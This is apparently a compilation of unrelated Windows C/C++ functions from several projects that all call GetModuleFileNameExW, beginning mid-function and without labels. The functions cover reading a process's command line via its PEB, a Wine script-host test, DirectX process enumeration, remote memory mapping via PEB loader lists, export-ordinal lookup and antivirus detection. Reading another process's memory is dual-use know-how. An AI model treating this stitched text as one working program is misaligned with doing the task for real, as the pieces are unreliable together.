FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), 0, tmpError, 1024, NULL);
purple_debug_error("gfire", "get_process_cmdline: Could not open process for reading:\n(%u) %s", (guint)GetLastError(), tmpError);
}
#ifdef DEBUG
else
purple_debug_error("gfire", "get_process_cmdline: Could not open process for reading:\n Access denied\n");
#endif // DEBUG
return FALSE;
}
peb = get_peb_address(process);
if(!peb)
{
#ifdef DEBUG
purple_debug_error("gfire", "get_process_cmdline: bad peb address!\n");
#endif // DEBUG
CloseHandle(process);
return FALSE;
}
if(!ReadProcessMemory(process, (PCHAR)peb + 0x10, &rtlUserProcParamsAddress, sizeof(PVOID), NULL))
{
if(GetLastError() != ERROR_ACCESS_DENIED && GetLastError() != ERROR_PARTIAL_COPY)
{
gchar tmpError[1024];
FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), 0, tmpError, 1024, NULL);
purple_debug_error("gfire", "get_process_cmdline: Could not read the address of ProcessParameters:\n(%u) %s", (guint)GetLastError(), tmpError);
}
#ifdef DEBUG
else
purple_debug_error("gfire", "get_process_cmdline: Could not read the address of ProcessParameters:\n Access denied/Partial Read\n");
#endif // DEBUG
CloseHandle(process);
return FALSE;
}
if(!ReadProcessMemory(process, (PCHAR)rtlUserProcParamsAddress + 0x40, &cmdline, sizeof(cmdline), NULL))
{
if(GetLastError() != ERROR_ACCESS_DENIED && GetLastError() != ERROR_PARTIAL_COPY)
{
gchar tmpError[1024];
FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), 0, tmpError, 1024, NULL);
purple_debug_error("gfire", "get_process_cmdline: Could not read CommandLine:\n(%u) %s", (guint)GetLastError(), tmpError);
}
#ifdef DEBUG
else
purple_debug_error("gfire", "get_process_cmdline: Could not read CommandLine:\n Access denied/Partial Read\n");
#endif // DEBUG
CloseHandle(process);
return FALSE;
}
cmdline_buff = (WCHAR*)g_malloc0(cmdline.Length);
if(!ReadProcessMemory(process, cmdline.Buffer, cmdline_buff, cmdline.Length, NULL))
{
if(GetLastError() != ERROR_ACCESS_DENIED && GetLastError() != ERROR_PARTIAL_COPY)
{
gchar tmpError[1024];
FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), 0, tmpError, 1024, NULL);
purple_debug_error("gfire", "get_process_cmdline: Could not read the command line string:\n(%u) %s", (guint)GetLastError(), tmpError);
}
#ifdef DEBUG
else
purple_debug_error("gfire", "get_process_cmdline: Could not read the command line string:\n Access denied/Partial Read\n");
#endif // DEBUG
g_free(cmdline_buff);
CloseHandle(process);
return FALSE;
}
*p_cmd_line = g_utf16_to_utf8((gunichar2*)cmdline_buff, cmdline.Length / 2, NULL, NULL, NULL);
g_free(cmdline_buff);
#ifdef DEBUG
if(!*p_cmd_line)
purple_debug_error("gfire", "get_process_cmdline: g_utf16_to_utf8 failed on cmdline\n");
#endif // DEBUG
// Get process executable
cmdline_buff = (WCHAR*)g_malloc(2048);
DWORD len = GetModuleFileNameExW(process, NULL, cmdline_buff, 1024);
if(len == 0)
{
if(GetLastError() != ERROR_ACCESS_DENIED)
{
gchar tmpError[1024];
FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), 0, tmpError, 1024, NULL);
purple_debug_error("gfire", "get_process_cmdline: Could not read the executable filename string:\n(%u) %s", (guint)GetLastError(), tmpError);
}
#ifdef DEBUG
else
purple_debug_error("gfire", "get_process_cmdline: Could not read the executable filename string:\n Access denied\n");
#endif // DEBUG
g_free(cmdline_buff);
g_free(*p_cmd_line);
*p_cmd_line = NULL;
CloseHandle(process);
return FALSE;
}
*p_exe = g_utf16_to_utf8((gunichar2*)cmdline_buff, len, NULL, NULL, NULL);
g_free(cmdline_buff);
#ifdef DEBUG
if(!*p_exe)
purple_debug_error("gfire", "get_process_cmdline: g_utf16_to_utf8 failed on exe\n");
#endif // DEBUG
CloseHandle(process);
return (*p_exe && *p_cmd_line);
}
static HRESULT WINAPI Dispatch_Invoke(IDispatch *iface, DISPID dispIdMember, REFIID riid, LCID lcid,
WORD wFlags, DISPPARAMS *pdp, VARIANT *pVarResult, EXCEPINFO *pExcepInfo, UINT *puArgErr)
{
switch(dispIdMember) {
case DISPID_TESTOBJ_OK: {
VARIANT *expr, *msg;
ok(wFlags == INVOKE_FUNC, "wFlags = %x\n", wFlags);
ok(pdp->cArgs == 2, "cArgs = %d\n", pdp->cArgs);
ok(!pdp->cNamedArgs, "cNamedArgs = %d\n", pdp->cNamedArgs);
expr = pdp->rgvarg+1;
if(V_VT(expr) == (VT_VARIANT|VT_BYREF))
expr = V_VARIANTREF(expr);
msg = pdp->rgvarg;
if(V_VT(msg) == (VT_VARIANT|VT_BYREF))
msg = V_VARIANTREF(msg);
ok(V_VT(msg) == VT_BSTR, "V_VT(psp->rgvargs) = %d\n", V_VT(msg));
ok(V_VT(expr) == VT_BOOL, "V_VT(psp->rgvargs+1) = %d\n", V_VT(expr));
ok(V_BOOL(expr), "%s: %s\n", script_name, wine_dbgstr_w(V_BSTR(msg)));
if(pVarResult)
V_VT(pVarResult) = VT_EMPTY;
break;
}
case DISPID_TESTOBJ_TRACE:
ok(wFlags == INVOKE_FUNC, "wFlags = %x\n", wFlags);
ok(pdp->cArgs == 1, "cArgs = %d\n", pdp->cArgs);
ok(!pdp->cNamedArgs, "cNamedArgs = %d\n", pdp->cNamedArgs);
ok(V_VT(pdp->rgvarg) == VT_BSTR, "V_VT(psp->rgvargs) = %d\n", V_VT(pdp->rgvarg));
trace("%s: %s\n", script_name, wine_dbgstr_w(V_BSTR(pdp->rgvarg)));
if(pVarResult)
V_VT(pVarResult) = VT_EMPTY;
break;
case DISPID_TESTOBJ_REPORTSUCCESS:
CHECK_EXPECT(reportSuccess);
ok(wFlags == INVOKE_FUNC, "wFlags = %x\n", wFlags);
ok(pdp->cArgs == 0, "cArgs = %d\n", pdp->cArgs);
ok(!pdp->cNamedArgs, "cNamedArgs = %d\n", pdp->cNamedArgs);
if(pVarResult)
V_VT(pVarResult) = VT_EMPTY;
break;
case DISPID_TESTOBJ_WSCRIPTFULLNAME:
{
WCHAR fullName[MAX_PATH];
DWORD res;
ok(wFlags == INVOKE_PROPERTYGET, "wFlags = %x\n", wFlags);
ok(pdp->cArgs == 0, "cArgs = %d\n", pdp->cArgs);
ok(!pdp->cNamedArgs, "cNamedArgs = %d\n", pdp->cNamedArgs);
V_VT(pVarResult) = VT_BSTR;
res = GetModuleFileNameExW(wscript_process, NULL, fullName, sizeof(fullName)/sizeof(WCHAR));
if(res == 0)
return E_FAIL;
if(!(V_BSTR(pVarResult) = SysAllocString(fullName)))
return E_OUTOFMEMORY;
break;
}
case DISPID_TESTOBJ_WSCRIPTPATH:
{
WCHAR fullPath[MAX_PATH];
DWORD res;
const WCHAR *pos;
ok(wFlags == INVOKE_PROPERTYGET, "wFlags = %x\n", wFlags);
ok(pdp->cArgs == 0, "cArgs = %d\n", pdp->cArgs);
ok(!pdp->cNamedArgs, "cNamedArgs = %d\n", pdp->cNamedArgs);
V_VT(pVarResult) = VT_BSTR;
res = GetModuleFileNameExW(wscript_process, NULL, fullPath, sizeof(fullPath)/sizeof(WCHAR));
if(res == 0)
return E_FAIL;
pos = mystrrchr(fullPath, '\\');
if(!(V_BSTR(pVarResult) = SysAllocStringLen(fullPath, pos-fullPath)))
return E_OUTOFMEMORY;
break;
}
case DISPID_TESTOBJ_WSCRIPTSCRIPTNAME:
{
char fullPath[MAX_PATH];
char *pos;
long res;
ok(wFlags == INVOKE_PROPERTYGET, "wFlags = %x\n", wFlags);
ok(pdp->cArgs == 0, "cArgs = %d\n", pdp->cArgs);
ok(!pdp->cNamedArgs, "cNamedArgs = %d\n", pdp->cNamedArgs);
V_VT(pVarResult) = VT_BSTR;
res = GetFullPathNameA(script_name, sizeof(fullPath)/sizeof(WCHAR), fullPath, &pos);
if(!res || res > sizeof(fullPath)/sizeof(WCHAR))
return E_FAIL;
if(!(V_BSTR(pVarResult) = SysAllocString(a2bstr(pos))))
return E_OUTOFMEMORY;
break;
}
case DISPID_TESTOBJ_WSCRIPTSCRIPTFULLNAME:
{
char fullPath[MAX_PATH];
long res;
ok(wFlags == INVOKE_PROPERTYGET, "wFlags = %x\n", wFlags);
ok(pdp->cArgs == 0, "cArgs = %d\n", pdp->cArgs);
ok(!pdp->cNamedArgs, "cNamedArgs = %d\n", pdp->cNamedArgs);
V_VT(pVarResult) = VT_BSTR;
res = GetFullPathNameA(script_name, sizeof(fullPath)/sizeof(WCHAR), fullPath, NULL);
if(!res || res > sizeof(fullPath)/sizeof(WCHAR))
return E_FAIL;
if(!(V_BSTR(pVarResult) = SysAllocString(a2bstr(fullPath))))
return E_OUTOFMEMORY;
break;
}
default:
ok(0, "unexpected dispIdMember %d\n", dispIdMember);
return E_NOTIMPL;
}
return S_OK;
}
QList<DWORD> * getDxProcessesIDs(QList<DWORD> * processes, LPCWSTR wstrSystemRootPath) {
DWORD aProcesses[1024];
HMODULE hMods[1024];
DWORD cbNeeded;
DWORD cProcesses;
char debug_buf[255];
WCHAR executableName[MAX_PATH];
unsigned int i;
// Get the list of process identifiers.
processes->clear();
if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
return NULL;
// Calculate how many process identifiers were returned.
cProcesses = cbNeeded / sizeof(DWORD);
// Print the names of the modules for each process.
for ( i = 0; i < cProcesses; i++ )
{
if (aProcesses[i] != GetCurrentProcessId()) {
HANDLE hProcess;
hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, aProcesses[i] );
if (NULL == hProcess)
goto nextProcess;
GetModuleFileNameExW(hProcess, 0, executableName, sizeof (executableName));
if (wcsstr(executableName, wstrSystemRootPath) != NULL) {
goto nextProcess;
}
PathStripPathW(executableName);
::WideCharToMultiByte(CP_ACP, 0, executableName, -1, debug_buf, 255, NULL, NULL);
DEBUG_MID_LEVEL << Q_FUNC_INFO << debug_buf;
for (unsigned k=0; k < SIZEOF_ARRAY(pwstrExcludeProcesses); k++) {
if (wcsicmp(executableName, pwstrExcludeProcesses[k])== 0) {
DEBUG_MID_LEVEL << Q_FUNC_INFO << "skipping " << pwstrExcludeProcesses;
goto nextProcess;
}
}
// Get a list of all the modules in this process.
if( EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded))
{
bool isDXPresent = false;
for ( DWORD j = 0; j < (cbNeeded / sizeof(HMODULE)); j++ )
{
WCHAR szModName[MAX_PATH];
if ( GetModuleFileNameExW( hProcess, hMods[j], szModName,
sizeof(szModName) / sizeof(WCHAR)))
{
PathStripPathW(szModName);
::WideCharToMultiByte(CP_ACP, 0, szModName, -1, debug_buf, 255, NULL, NULL);
DEBUG_HIGH_LEVEL << Q_FUNC_INFO << debug_buf;
if(wcsicmp(szModName, lightpackHooksDllName) == 0) {
goto nextProcess;
} else {
if (wcsicmp(szModName, L"d3d9.dll") == 0 ||
wcsicmp(szModName, L"dxgi.dll") == 0 )
isDXPresent = true;
}
}
}
if (isDXPresent)
processes->append(aProcesses[i]);
}
nextProcess:
// Release the handle to the process.
CloseHandle( hProcess );
}
}
return processes;
}
bool UpdateMemoryMap(void)
{
MemMap.clear();
MemMapCode.clear();
MemMapData.clear();
MemMapModule.clear();
Exports.clear();
CustomNames.clear();
if (g_hProcess == NULL)
{
#ifdef _DEBUG
PrintOut(_T("[UpdateMemoryMap]: Process handle NULL!"));
#endif
return 0;
}
if (!IsProcHandleValid(g_hProcess))
{
g_hProcess = NULL;
#ifdef _DEBUG
PrintOut(_T("[UpdateMemoryMap]: Process handle invalid!"));
#endif
return 0;
}
SYSTEM_INFO SysInfo;
GetSystemInfo(&SysInfo);
MEMORY_BASIC_INFORMATION MemInfo;
size_t pMemory = (size_t)SysInfo.lpMinimumApplicationAddress;
while (pMemory < (size_t)SysInfo.lpMaximumApplicationAddress)
{
if (VirtualQueryEx(g_hProcess, (LPCVOID)pMemory, &MemInfo, sizeof(MEMORY_BASIC_INFORMATION)) != 0)
{
if (MemInfo.State == MEM_COMMIT /*&& MemInfo.Type == MEM_PRIVATE*/)
{
MemMapInfo Mem;
Mem.Start = (size_t)pMemory;
Mem.End = (size_t)pMemory + MemInfo.RegionSize - 1;
MemMap.push_back(Mem);
}
pMemory = (ULONG_PTR)MemInfo.BaseAddress + MemInfo.RegionSize;
}
else
{
pMemory += 1024;
}
}
static HMODULE hNtDll = (HMODULE)Utils::GetLocalModuleHandle("ntdll.dll");
static tNtQueryInformationProcess NtQueryInformationProcess = (tNtQueryInformationProcess)Utils::GetProcAddress(hNtDll, "NtQueryInformationProcess");
PPROCESS_BASIC_INFORMATION ProcessInfo = NULL;
PEB Peb;
PEB_LDR_DATA LdrData;
// Try to allocate buffer
HANDLE hHeap = GetProcessHeap();
DWORD dwSize = sizeof(PROCESS_BASIC_INFORMATION);
ProcessInfo = (PPROCESS_BASIC_INFORMATION)HeapAlloc(hHeap, HEAP_ZERO_MEMORY | HEAP_GENERATE_EXCEPTIONS, dwSize);
ULONG dwSizeNeeded = 0;
NTSTATUS status = NtQueryInformationProcess(g_hProcess, ProcessBasicInformation, ProcessInfo, dwSize, &dwSizeNeeded);
if (status >= 0 && dwSize < dwSizeNeeded)
{
if (ProcessInfo)
HeapFree(hHeap, 0, ProcessInfo);
ProcessInfo = (PPROCESS_BASIC_INFORMATION)HeapAlloc(hHeap, HEAP_ZERO_MEMORY | HEAP_GENERATE_EXCEPTIONS, dwSizeNeeded);
if (!ProcessInfo)
{
#ifdef _DEBUG
PrintOut(_T("[UpdateMemoryMap]: Couldn't allocate heap buffer!"));
#endif
return 0;
}
status = NtQueryInformationProcess(g_hProcess, ProcessBasicInformation, ProcessInfo, dwSizeNeeded, &dwSizeNeeded);
}
// Did we successfully get basic info on process
if (NT_SUCCESS(status))
{
// Check for PEB
if (!ProcessInfo->PebBaseAddress)
{
#ifdef _DEBUG
PrintOut(_T("[UpdateMemoryMap]: PEB is null! Aborting UpdateExports!"));
#endif
if (ProcessInfo)
HeapFree(hHeap, 0, ProcessInfo);
return 0;
}
// Read Process Environment Block (PEB)
SIZE_T dwBytesRead = 0;
if ( ReadMemory( ProcessInfo->PebBaseAddress, &Peb, sizeof(PEB), &dwBytesRead) == 0)
{
#ifdef _DEBUG
PrintOut(_T("[UpdateMemoryMap]: Failed to read PEB! Aborting UpdateExports!"));
#endif
if (ProcessInfo)
HeapFree(hHeap, 0, ProcessInfo);
return 0;
}
// Get Ldr
dwBytesRead = 0;
if ( ReadMemory( Peb.Ldr, &LdrData, sizeof(LdrData), &dwBytesRead) == 0)
{
#ifdef _DEBUG
PrintOut(_T("[UpdateMemoryMap]: Failed to read PEB Ldr Data! Aborting UpdateExports!"));
#endif
if (ProcessInfo)
HeapFree(hHeap, 0, ProcessInfo);
return 0;
}
LIST_ENTRY *pLdrListHead = (LIST_ENTRY *)LdrData.InLoadOrderModuleList.Flink;
LIST_ENTRY *pLdrCurrentNode = LdrData.InLoadOrderModuleList.Flink;
do
{
LDR_DATA_TABLE_ENTRY lstEntry = { 0 };
dwBytesRead = 0;
if (! ReadMemory( (void*)pLdrCurrentNode, &lstEntry, sizeof(LDR_DATA_TABLE_ENTRY), &dwBytesRead))
{
#ifdef _DEBUG
PrintOut(_T("[UpdateMemoryMap]: Could not read list entry from LDR list. Error = %s"), Utils::GetLastErrorString().GetString());
#endif
if (ProcessInfo)
HeapFree(hHeap, 0, ProcessInfo);
return 0;
}
pLdrCurrentNode = lstEntry.InLoadOrderLinks.Flink;
if (lstEntry.DllBase != NULL /*&& lstEntry.SizeOfImage != 0*/)
{
unsigned char* ModuleBase = (unsigned char*)lstEntry.DllBase;
DWORD ModuleSize = lstEntry.SizeOfImage;
wchar_t wcsFullDllName[MAX_PATH] = { 0 };
wchar_t* wcsModule = 0;
if (lstEntry.FullDllName.Length > 0)
{
dwBytesRead = 0;
if ( ReadMemory( (LPVOID)lstEntry.FullDllName.Buffer, &wcsFullDllName, lstEntry.FullDllName.Length, &dwBytesRead))
{
wcsModule = wcsrchr(wcsFullDllName, L'\\');
if (!wcsModule)
wcsModule = wcsrchr(wcsFullDllName, L'/');
wcsModule++;
if (g_AttachedProcessAddress == NULL)
{
wchar_t filename[MAX_PATH];
GetModuleFileNameExW(g_hProcess, NULL, filename, MAX_PATH);
if (_wcsicmp(filename, wcsFullDllName) == 0)
{
g_AttachedProcessAddress = (size_t)ModuleBase;
g_AttachedProcessSize = ModuleSize;
}
}
}
}
// module info
MemMapInfo Mem;
Mem.Start = (size_t)ModuleBase;
Mem.End = Mem.Start + ModuleSize;
Mem.Size = ModuleSize;
Mem.Name = wcsModule;
Mem.Path = wcsFullDllName;
//PrintOut(_T("%s: %IX"), Mem.Name.GetBuffer(), Mem.Start);
MemMapModule.push_back(Mem);
// module code
IMAGE_DOS_HEADER DosHdr;
IMAGE_NT_HEADERS NtHdr;
ReadMemory( ModuleBase, &DosHdr, sizeof(IMAGE_DOS_HEADER), NULL);
ReadMemory( ModuleBase + DosHdr.e_lfanew, &NtHdr, sizeof(IMAGE_NT_HEADERS), NULL);
DWORD sectionsSize = (DWORD)NtHdr.FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER);
PIMAGE_SECTION_HEADER sections = (PIMAGE_SECTION_HEADER)malloc(sectionsSize);
ReadMemory( ModuleBase + DosHdr.e_lfanew + sizeof(IMAGE_NT_HEADERS), sections, sectionsSize, NULL);
for (int i = 0; i < NtHdr.FileHeader.NumberOfSections; i++)
{
CString txt;
MemMapInfo Mem;
txt.Format(_T("%.8s"), sections[i].Name); txt.MakeLower();
if (txt == ".text" || txt == "code")
{
Mem.Start = (size_t)ModuleBase + sections[i].VirtualAddress;
Mem.End = Mem.Start + sections[i].Misc.VirtualSize;
Mem.Name = wcsModule;
MemMapCode.push_back(Mem);
}
if (txt == ".data" || txt == "data" || txt == ".rdata" || txt == ".idata")
{
Mem.Start = (size_t)ModuleBase + sections[i].VirtualAddress;
Mem.End = Mem.Start + sections[i].Misc.VirtualSize;
Mem.Name = wcsModule;
MemMapData.push_back(Mem);
}
}
delete sections;
}
} while (pLdrListHead != pLdrCurrentNode);
}
else
{
#ifdef _DEBUG
PrintOut(_T("[UpdateExports]: NtQueryInformationProcess failed! Aborting..."));
#endif
if (ProcessInfo)
HeapFree(hHeap, 0, ProcessInfo);
return 0;
}
if (ProcessInfo)
HeapFree(hHeap, 0, ProcessInfo);
for (UINT i = 0; i < MemMap.size(); i++)
{
if (IsModule(MemMap[i].Start))
MemMap[i].Name = GetModuleName(MemMap[i].Start);
}
return 1;
}
DWORD EngineGetAPIOrdinalRemote(HANDLE hProcess, ULONG_PTR APIAddress)
{
if(!hProcess) //no process specified
{
if(!dbgProcessInformation.hProcess)
hProcess = GetCurrentProcess();
else
hProcess = dbgProcessInformation.hProcess;
}
HANDLE FileHandle;
DWORD FileSize;
HANDLE FileMap;
ULONG_PTR FileMapVA;
ULONG_PTR ModuleBase = EngineGetModuleBaseRemote(hProcess, APIAddress);
if(!ModuleBase)
return 0;
wchar_t szModulePath[MAX_PATH] = L"";
if(!GetModuleFileNameExW(hProcess, (HMODULE)ModuleBase, szModulePath, _countof(szModulePath)))
return 0;
if(MapFileExW(szModulePath, UE_ACCESS_READ, &FileHandle, &FileSize, &FileMap, &FileMapVA, 0))
{
PIMAGE_DOS_HEADER DOSHeader = (PIMAGE_DOS_HEADER)FileMapVA;
if(EngineValidateHeader(FileMapVA, NULL, NULL, DOSHeader, true))
{
PIMAGE_NT_HEADERS32 PEHeader32 = (PIMAGE_NT_HEADERS32)((ULONG_PTR)DOSHeader + DOSHeader->e_lfanew);
PIMAGE_NT_HEADERS64 PEHeader64 = (PIMAGE_NT_HEADERS64)((ULONG_PTR)DOSHeader + DOSHeader->e_lfanew);
ULONG_PTR ExportDirectoryVA;
DWORD ExportDirectorySize;
ULONG_PTR ImageBase;
if(PEHeader32->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC)
{
ImageBase = PEHeader32->OptionalHeader.ImageBase;
ExportDirectoryVA = (ULONG_PTR)PEHeader32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
ExportDirectorySize = (ULONG_PTR)PEHeader32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
}
else //x64
{
ImageBase = (ULONG_PTR)PEHeader64->OptionalHeader.ImageBase;
ExportDirectoryVA = (ULONG_PTR)PEHeader64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
ExportDirectorySize = (ULONG_PTR)PEHeader64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
}
PIMAGE_EXPORT_DIRECTORY ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)ConvertVAtoFileOffset(FileMapVA, ExportDirectoryVA + ImageBase, true);
if(ExportDirectory)
{
DWORD* AddrOfFunctions = (DWORD*)ConvertVAtoFileOffset(FileMapVA, ExportDirectory->AddressOfFunctions + ImageBase, true);
if(AddrOfFunctions)
{
unsigned int NumberOfFunctions = ExportDirectory->NumberOfFunctions;
for(unsigned int i = 0, j = 0; i < NumberOfFunctions; i++)
{
unsigned int curRva = AddrOfFunctions[i];
if(!curRva)
continue;
j++; //ordinal
if(curRva < ExportDirectoryVA || curRva >= ExportDirectoryVA + ExportDirectorySize) //non-forwarded exports
{
if(curRva + ModuleBase == APIAddress)
{
UnMapFileEx(FileHandle, FileSize, FileMap, FileMapVA);
return j;
}
}
}
}
}
}
UnMapFileEx(FileHandle, FileSize, FileMap, FileMapVA);
}
return 0;
}
//////////////////////////////////////////////////////////
//
// CheckAntiVirusStatus
//
// Maybe warn user if no anti-virus running
//
//////////////////////////////////////////////////////////
void CheckAntiVirusStatus( void )
{
// Get data from WMI
std::vector < SString > enabledList;
std::vector < SString > disabledList;
GetWMIAntiVirusStatus( enabledList, disabledList );
// Get status from WSC
WSC_SECURITY_PROVIDER_HEALTH health = (WSC_SECURITY_PROVIDER_HEALTH)-1;
if ( _WscGetSecurityProviderHealth )
{
_WscGetSecurityProviderHealth( WSC_SECURITY_PROVIDER_ANTIVIRUS, &health );
}
// Dump results
SString strStatus( "AV health: %s (%d)", *EnumToString( health ), health );
for ( uint i = 0 ; i < enabledList.size() ; i++ )
strStatus += SString( " [Ena%d:%s]", i, *enabledList[i] );
for ( uint i = 0 ; i < disabledList.size() ; i++ )
strStatus += SString( " [Dis%d:%s]", i, *disabledList[i] );
WriteDebugEvent( strStatus );
// Maybe show dialog if av not found
if ( enabledList.empty() && health != WSC_SECURITY_PROVIDER_HEALTH_GOOD )
{
bool bEnableScaremongering = ( health != WSC_SECURITY_PROVIDER_HEALTH_NOTMONITORED );
if ( bEnableScaremongering )
{
const char* avProducts[] = { "antivirus", "anti-virus", "Avast", "AVG", "Avira",
"NOD32", "ESET", "F-Secure", "Faronics", "Kaspersky",
"McAfee", "Norton", "Symantec", "Panda", "Trend Micro", };
// Check for anti-virus helper dlls before actual scaremongering
HMODULE aModules[1024];
DWORD cbNeeded;
if ( EnumProcessModules( GetCurrentProcess(), aModules, sizeof(aModules), &cbNeeded) )
{
DWORD cModules = cbNeeded / sizeof(HMODULE);
for ( uint i = 0 ; i < cModules ; i++ )
{
if( aModules[i] != 0 )
{
WCHAR szModulePathFileName[1024] = L"";
GetModuleFileNameExW ( GetCurrentProcess(), aModules[i], szModulePathFileName, NUMELMS(szModulePathFileName) );
SLibVersionInfo libVersionInfo;
GetLibVersionInfo ( ToUTF8( szModulePathFileName ), &libVersionInfo );
for( uint i = 0 ; i < NUMELMS( avProducts ) ; i++ )
{
if ( libVersionInfo.strCompanyName.ContainsI( avProducts[i] )
|| libVersionInfo.strProductName.ContainsI( avProducts[i] ) )
{
bEnableScaremongering = false;
WriteDebugEvent( SString( "AV (module) maybe found %s [%d](%s,%s)", *WStringX( szModulePathFileName ).ToAnsi(), i, *libVersionInfo.strCompanyName, *libVersionInfo.strProductName ) );
}
}
}
}
if ( bEnableScaremongering )
WriteDebugEvent( SString( "AV Searched %d dlls, but could not find av helper", cModules ) );
}
if ( bEnableScaremongering )
{
std::vector < DWORD > processIdList = MyEnumProcesses();
for ( uint i = 0; i < processIdList.size (); i++ )
{
DWORD processId = processIdList[i];
// Skip 64 bit processes to avoid errors
if ( !Is32bitProcess ( processId ) )
continue;
std::vector < SString > filenameList = GetPossibleProcessPathFilenames ( processId );
for ( uint i = 0; i < filenameList.size (); i++ )
{
const SString& strProcessPathFileName = filenameList[i];
SLibVersionInfo libVersionInfo;
if ( GetLibVersionInfo ( strProcessPathFileName, &libVersionInfo ) )
{
for( uint i = 0 ; i < NUMELMS( avProducts ) ; i++ )
{
if ( libVersionInfo.strCompanyName.ContainsI( avProducts[i] )
|| libVersionInfo.strProductName.ContainsI( avProducts[i] ) )
{
bEnableScaremongering = false;
WriteDebugEvent( SString( "AV (process) maybe found %s [%d](%s,%s)", *strProcessPathFileName, i, *libVersionInfo.strCompanyName, *libVersionInfo.strProductName ) );
}
}
}
}
}
if ( bEnableScaremongering )
WriteDebugEvent( SString( "AV Searched %d processes, but could not find av helper", processIdList.size() ) );
}
}
ShowNoAvDialog( g_hInstance, bEnableScaremongering );
HideNoAvDialog ();
}
}
//-------------------------------------------------------------------------------------------------
EXPORT DWORD WINAPI GetModuleFileNameExWStub(HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize)
{
return GetModuleFileNameExW(hProcess, hModule, lpFilename, nSize);
}
